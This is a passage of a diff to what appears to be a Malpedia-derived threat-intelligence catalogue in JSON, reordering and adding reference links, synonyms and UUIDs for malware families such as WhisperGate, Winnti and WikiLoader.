"https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", - "https://us-cert.cisa.gov/ncas/alerts/aa21-116a", - "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b" ], "synonyms": [], "type": [] @@ -50424,80 +52894,81 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate", - "https://blog.gigamon.com/2022/01/28/focusing-on-left-of-boom/", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?", - "https://unit42.paloaltonetworks.com/atoms/ruinousursa/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/return-of-pseudo-ransomware.html", - "https://stairwell.com/news/whispers-in-the-noise-microsoft-ukraine-whispergate/", - "https://www.youtube.com/watch?v=Ek3URIaC5O8", - "https://www.youtube.com/watch?v=mrTdSdMMgnk", - "https://blogs.blackberry.com/en/2022/01/threat-thursday-whispergate-wiper", - "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", - "https://lifars.com/2022/01/a-detailed-analysis-of-whispergate-targeting-ukrainian-organizations/", - "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine", - "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/", - "https://zetter.substack.com/p/hackers-were-in-ukraine-systems-months", - "https://go.recordedfuture.com/hubfs/reports/pov-2022-0127.pdf", - "https://www.recordedfuture.com/whispergate-malware-corrupts-computers-ukraine/", - "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", - "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://github.com/OALabs/Lab-Notes/blob/main/WhisperGate/WhisperGate.ipynb", - "https://thehackernews.com/2022/02/putin-warns-russian-critical.html", + "https://zetter.substack.com/p/dozens-of-computers-in-ukraine-wiped", "https://www.crowdstrike.com/blog/who-is-ember-bear/", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/update-on-whispergate-destructive-malware-targeting-ukraine.html", - "https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html", - "https://www.cadosecurity.com/resources-for-dfir-professionals-responding-to-whispergate-malware/", - "https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware/", - "https://intel471.com/blog/russia-ukraine-conflict-cybercrime-underground", + "https://blogs.blackberry.com/en/2022/01/threat-thursday-whispergate-wiper", "https://cert.gov.ua/article/18101", + "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", + "https://www.recordedfuture.com/whispergate-malware-corrupts-computers-ukraine/", + "https://intel471.com/blog/russia-ukraine-conflict-cybercrime-underground", + "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator.md", + "https://inquest.net/blog/2022/02/10/380-glowspark", + "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", + "https://www.crowdstrike.com/blog/how-crowdstrike-protects-against-data-wiping-malware/", + "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://blog.gigamon.com/2022/01/28/focusing-on-left-of-boom/", + "https://www.cadosecurity.com/resources-for-dfir-professionals-responding-to-whispergate-malware/", + "https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/", "https://twitter.com/Libranalysis/status/1483128221956808704", - "https://rxored.github.io/post/analysis/whispergate/whispergate/", - "https://maxkersten.nl/binary-analysis-course/malware-analysis/dumping-whispergates-wiper-from-an-eazfuscator-obfuscated-loader/", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf", - "https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/", - "https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/", + "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/return-of-pseudo-ransomware.html", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", + "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html?splunk", + "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://www.youtube.com/watch?v=Ek3URIaC5O8", "https://blogs.microsoft.com/on-the-issues/2022/01/15/mstic-malware-cyberattacks-ukraine-government/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/update-on-whispergate-destructive-malware-targeting-ukraine.html", + "https://www.netskope.com/blog/netskope-threat-coverage-whispergate", + "https://go.recordedfuture.com/hubfs/reports/pov-2022-0127.pdf", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a", + "https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/", + "https://twitter.com/nunohaien/status/1484088885575622657", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf", + "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", + "https://csirt-mon.wp.mil.pl/pl/articles6-aktualnosci/analysis-cyberattack-ukrainian-government-resources/", + "https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/", + "https://info.cyborgsecurity.com/hubfs/Emerging%20Threats/WhisperGate%20Malware%20Update%20-%20Emerging%20Threat.pdf", + "https://rxored.github.io/post/analysis/whispergate/whispergate/", + "https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware/", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://twitter.com/HuskyHacksMK/status/1482876242047258628", + "https://www.elastic.co/fr/security-labs/operation-bleeding-bear", + "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation", + "https://www.secureworks.com/blog/disruptive-attacks-in-ukraine-likely-linked-to-escalating-tensions", + "https://lifars.com/2022/01/a-detailed-analysis-of-whispergate-targeting-ukrainian-organizations/", + "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", + "https://stairwell.com/news/whispers-in-the-noise-microsoft-ukraine-whispergate/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", + "https://zetter.substack.com/p/hackers-were-in-ukraine-systems-months", + "https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html", + "https://unit42.paloaltonetworks.com/atoms/ruinousursa/", + "https://github.com/OALabs/Lab-Notes/blob/main/WhisperGate/WhisperGate.ipynb", + "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", + "https://www.youtube.com/watch?v=2nd-f1dIfD4", + "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://thehackernews.com/2022/02/putin-warns-russian-critical.html", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?", "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/", "https://www.brighttalk.com/webcast/15591/534324", - "https://csirt-mon.wp.mil.pl/pl/articles6-aktualnosci/analysis-cyberattack-ukrainian-government-resources/", - "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks", - "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", - "https://www.netskope.com/blog/netskope-threat-coverage-whispergate", - "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", - "https://twitter.com/nunohaien/status/1484088885575622657", - "https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html", - "https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine", - "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", - "https://info.cyborgsecurity.com/hubfs/Emerging%20Threats/WhisperGate%20Malware%20Update%20-%20Emerging%20Threat.pdf", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://twitter.com/HuskyHacksMK/status/1482876242047258628", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", - "https://twitter.com/knight0x07/status/1483401072102502400", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://www.secureworks.com/blog/whispergate-not-notpetya", - "https://zetter.substack.com/p/dozens-of-computers-in-ukraine-wiped", - "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", - "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/", - "https://www.youtube.com/watch?v=2nd-f1dIfD4", - "https://www.crowdstrike.com/blog/how-crowdstrike-protects-against-data-wiping-malware/", "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html", - "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", - "https://inquest.net/blog/2022/02/10/380-glowspark", - "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation", - "https://www.elastic.co/fr/security-labs/operation-bleeding-bear", - "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html?splunk", - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a", - "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/", - "https://www.crowdstrike.com/blog/lessons-from-past-cyber-operations-against-ukraine/", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf", - "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator.md", - "https://www.secureworks.com/blog/disruptive-attacks-in-ukraine-likely-linked-to-escalating-tensions" + "https://maxkersten.nl/binary-analysis-course/malware-analysis/dumping-whispergates-wiper-from-an-eazfuscator-obfuscated-loader/", + "https://www.secureworks.com/blog/whispergate-not-notpetya", + "https://www.youtube.com/watch?v=mrTdSdMMgnk", + "https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine", + "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", + "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/", + "https://www.crowdstrike.com/blog/lessons-from-past-cyber-operations-against-ukraine/", + "https://twitter.com/knight0x07/status/1483401072102502400" ], "synonyms": [ "PAYWIPE" @@ -50512,8 +52983,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird", - "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", - "https://st.drweb.com/static/new-www/news/2020/september/tek_rf_article_en.pdf" + "https://st.drweb.com/static/new-www/news/2020/september/tek_rf_article_en.pdf", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf" ], "synonyms": [], "type": [] @@ -50526,8 +52997,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiteblackcrypt", - "https://sebdraven.medium.com/whisperkill-vs-whiteblackcrypt-un-petit-soucis-de-fichiers-9c4dcd013316", - "https://www.checkmal.com/video/read/3605/" + "https://www.checkmal.com/video/read/3605/", + "https://sebdraven.medium.com/whisperkill-vs-whiteblackcrypt-un-petit-soucis-de-fichiers-9c4dcd013316" ], "synonyms": [ "WARYLOOK" @@ -50537,6 +53008,35 @@ "uuid": "f587a5a2-907e-456c-91e9-74fd997c03b5", "value": "WhiteBlackCrypt" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.whitesnake", + "https://bazaar.abuse.ch/sample/5066eca9c7309af16c882ffae79ceee93d5c8a8bcfe3726455c9b5589a492553/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8f5bb3ec-a764-4ef4-a113-532a3d4b82c4", + "value": "WhiteSnake Stealer" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wikiloader", + "https://twitter.com/threatinsight/status/1679864625544978432", + "https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion" + ], + "synonyms": [ + "WailingCrab" + ], + "type": [] + }, + "uuid": "8dd43a3f-320a-4bdd-8379-b592cd6efc1f", + "value": "WikiLoader" + }, { "description": "", "meta": { @@ -50554,13 +53054,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.windealer", - "https://securelist.com/windealer-dealing-on-the-side/105946/", - "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf", "https://mssplab.github.io/threat-hunting/2023/05/08/malware-analysis-windealer.html", "https://securelist.com/windealer-dealing-on-the-side/105946", + "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf", + "https://blogs.jpcert.or.jp/en/2021/10/windealer.html", "https://blogs.blackberry.com/en/2022/06/threat-thursday-china-based-apt-plays-auto-updater-card-to-deliver-windealer-malware", - "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_7_leon-niwa-ishimaru_en.pdf", - "https://blogs.jpcert.or.jp/en/2021/10/windealer.html" + "https://securelist.com/windealer-dealing-on-the-side/105946/", + "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_7_leon-niwa-ishimaru_en.pdf" ], "synonyms": [], "type": [] @@ -50586,9 +53086,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/" + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf" ], "synonyms": [], "type": [] @@ -50601,60 +53101,60 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", - "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", - "http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf", - "https://attack.mitre.org/groups/G0096", - "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", - "https://github.com/TKCERT/winnti-nmap-script", - "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", - "https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/", - "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/", - "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf", "https://docplayer.net/162112338-Don-t-miss-the-forest-for-the-trees-gleaning-hunting-value-from-too-much-intrusion-data.html", - "https://github.com/superkhung/winnti-sniff", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf", - "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", - "https://content.fireeye.com/api/pdfproxy?id=86840", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf", - "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf", + "https://www.youtube.com/watch?v=_fstHQSK-kk", "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", - "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf", "https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive", - "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", - "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/", - "https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html", - "https://www.secureworks.com/research/threat-profiles/bronze-atlas", - "https://www.lastline.com/labsblog/helo-winnti-attack-scan/", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf", - "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", - "https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html", - "https://content.fireeye.com/apt-41/rpt-apt41/", - "https://github.com/br-data/2019-winnti-analyse/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", - "https://github.com/TKCERT/winnti-detector", - "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", - "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/", - "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", + "https://github.com/TKCERT/winnti-suricata-lua", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf", + "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/", "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", - "https://www.youtube.com/watch?v=_fstHQSK-kk", + "https://content.fireeye.com/api/pdfproxy?id=86840", + "https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://www.lastline.com/labsblog/helo-winnti-attack-scan/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf", + "https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/", + "https://github.com/superkhung/winnti-sniff", + "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", + "https://content.fireeye.com/apt-41/rpt-apt41/", + "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", + "https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html", + "https://github.com/TKCERT/winnti-detector", + "https://blogs.vmware.com/security/2021/11/monitoring-winnti-4-0-c2-servers-for-two-years.html", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://securelist.com/games-are-over/70991/", + "https://attack.mitre.org/groups/G0096", + "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", + "https://github.com/TKCERT/winnti-nmap-script", + "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf", - "https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/", - "http://web.br.de/interaktiv/winnti/english/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", - "https://securelist.com/games-are-over/70991/", - "https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf", - "https://github.com/TKCERT/winnti-suricata-lua", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf", "https://securelist.com/apt-trends-report-q3-2020/99204/", - "https://blogs.vmware.com/security/2021/11/monitoring-winnti-4-0-c2-servers-for-two-years.html", - "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/" + "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/", + "https://github.com/br-data/2019-winnti-analyse/", + "http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", + "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/", + "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", + "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/", + "https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf", + "https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "http://web.br.de/interaktiv/winnti/english/", + "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf" ], "synonyms": [ "BleDoor", @@ -50685,9 +53185,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot", - "https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/", "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/", - "https://securelist.com/atm-robber-winpot/89611/" + "https://securelist.com/atm-robber-winpot/89611/", + "https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/" ], "synonyms": [ "ATMPot" @@ -50728,11 +53228,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", - "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", - "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + "https://docs.broadcom.com/doc/waterbug-attack-group", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", - "https://docs.broadcom.com/doc/waterbug-attack-group" + "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf" ], "synonyms": [ "Epic", @@ -50817,9 +53317,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger", - "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", + "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf" ], "synonyms": [ "WoolenLogger" @@ -50848,8 +53348,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole", - "https://content.fireeye.com/apt/rpt-apt38", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf" + "https://securelist.com/lazarus-under-the-hood/77908/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", + "https://content.fireeye.com/apt/rpt-apt38" ], "synonyms": [], "type": [] @@ -50890,8 +53391,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl", - "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", - "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", + "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" ], "synonyms": [], "type": [] @@ -50904,9 +53405,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wslink", - "https://twitter.com/darienhuss/status/1453342652682981378", + "https://www.welivesecurity.com/2021/10/27/wslink-unique-undocumented-malicious-loader-runs-server/", "https://www.welivesecurity.com/wp-content/uploads/2022/03/eset_wsliknkvm.pdf", - "https://www.welivesecurity.com/2021/10/27/wslink-unique-undocumented-malicious-loader-runs-server/" + "https://twitter.com/darienhuss/status/1453342652682981378" ], "synonyms": [ "FinickyFrogfish" @@ -50921,8 +53422,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.x4", - "https://www.gradiant.org/noticia/analysis-malware-cve-2017/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage" + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage", + "https://www.gradiant.org/noticia/analysis-malware-cve-2017/" ], "synonyms": [], "type": [] @@ -50936,20 +53437,20 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf", - "https://assets.documentcloud.org/documents/3461560/Google-Aquarium-Clean.pdf", - 